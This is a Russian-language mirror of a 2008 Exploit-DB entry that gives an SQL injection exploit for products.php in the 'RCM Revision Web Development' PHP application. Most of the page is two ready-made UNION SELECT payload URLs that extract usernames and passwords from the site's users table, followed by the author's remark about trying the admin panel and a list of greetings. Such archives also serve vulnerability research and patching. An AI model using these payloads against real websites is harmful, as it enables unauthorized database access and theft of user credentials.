- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 5972
- Проверка EDB
-
- Пройдено
- Автор
- NIIUB
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2008-06-30
Код:
##########################################################
#
# RCM Revision Web Development (products.php) SQL Injection Vulnerability
#
# by D3m0n a.k.a Niiub
#
# Home: www.bl4ck-b0x.info
#
# niiub[at]bl4ck-b0x.info
#
##########################################################
##########################################################
Exploit:
products.php?cat=-1%20union%20select%201,2,3,4,concat_ws(0x3a,user_name,
user_password),6%20from%20users/*
OR
/gr/products.php?cat=-1%20union%20select%201,2,3,4,concat_ws(0x3a,user_name,
user_password),6%20from%20users/*
##########################################################
Note: There can by diffrent number of Table, you have to search.
Note2: The admin Panel is www.site.com/admin/ but i can't login with the
Password and Login name from the SQL Injection. :(
##########################################################
Greetz: dun - sid_psycho - Kacper - Str0ke
###########################################################
# milw0rm.com [2008-06-30]- Источник
- www.exploit-db.com
